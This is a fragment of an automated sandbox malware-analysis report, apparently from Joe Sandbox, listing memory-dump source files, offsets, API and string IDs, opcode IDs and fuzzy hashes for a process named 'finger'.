                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallFilterFunc@8
                                                                                                      • String ID: @$@4Qw@4Qw
                                                                                                      • API String ID: 4062629308-2383119779
                                                                                                      • Opcode ID: aa4af5e226bd5994cc37b8869978df7f8b39ac300ea5e85eb3bf654946d27c1d
                                                                                                      • Instruction ID: c8b3c32f4b65a1bd11c6f3b2ab226b94420afee8afe8445f5dc64df957fcdb12
                                                                                                      • Opcode Fuzzy Hash: aa4af5e226bd5994cc37b8869978df7f8b39ac300ea5e85eb3bf654946d27c1d
                                                                                                      • Instruction Fuzzy Hash: 6241CB75A02618DFDB21DFA8D940AAEBBF8EF44B00F04406AEA10DB268D774D800CF61
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3270976336.0000000002ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2ed0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $$0$@$@
                                                                                                      • API String ID: 0-1132210376
                                                                                                      • Opcode ID: 4fe272b2b72627303fa43c44375c99b71c90e76ecacbfcf8f168d034213176c6
                                                                                                      • Instruction ID: 85e4b472255c9df236b1f32f3ec6d963e49cf9f3ffaf5566887b34f6d4c35a7e
                                                                                                      • Opcode Fuzzy Hash: 4fe272b2b72627303fa43c44375c99b71c90e76ecacbfcf8f168d034213176c6
                                                                                                      • Instruction Fuzzy Hash: 7F51B1706587488FCB18CF68C8856DEBBF0FB89714F10559EE98AD7241C734E546CB86